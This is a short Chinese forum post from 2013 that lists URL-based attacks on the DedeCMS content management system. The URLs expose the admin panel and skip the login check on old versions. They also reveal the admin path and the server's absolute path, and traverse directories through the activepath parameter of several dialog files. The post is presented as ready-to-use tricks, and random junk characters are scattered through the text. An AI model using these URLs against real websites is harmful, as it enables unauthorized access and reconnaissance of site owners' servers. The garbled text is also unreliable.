1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理3 d# v X7 k$ \! {, c5 h
' c$ E1 u7 M9 S# K
员帐号,新版本的就直接转向了后台.
% l( D; {. N H' `
2 ]7 l2 x4 |3 C- }- J* k9 F2.include/dialog/config.php会爆出后台管理路径
2 I( h5 m+ ]' t+ O1 u1 g2 z# o* Q" Z) V& S& |" V
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
% r! Z/ O2 \& X: _: }
4 o! d( C% `+ f0 @# v( D; Q4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径., }# ^- \, s; M9 c9 V& j
5 F) ]& ?' J$ l5 F8 e7 o/ l5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉+ ?: |: E+ c6 S6 c, t8 H1 T8 u
' K) S, w8 S) R) Y. V到根目录去.不过这些版本的访问地址有些不同.3 s% g9 D& A$ k2 k
地址为require/dialog/select_soft.php?activepath=/././././././././4 l2 w6 n: A( l
( C2 X v2 q5 i
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
, @0 e2 U% Y+ w* Q5 V A存在相同问题的文件还有. s3 Z$ h2 a; N- y! k6 e+ m2 o: V
include\dialog\select_images.php1 s9 O8 {7 z* `, v b; D* }
include\dialog\select_media.php' r4 b: ^4 n S" p T4 j! ?
include\dialog\select_templets.php2 ^9 E+ t$ \- P; r1 P1 f4 `
|
发表于 2013-4-16 16:50:43
收藏
支持
反对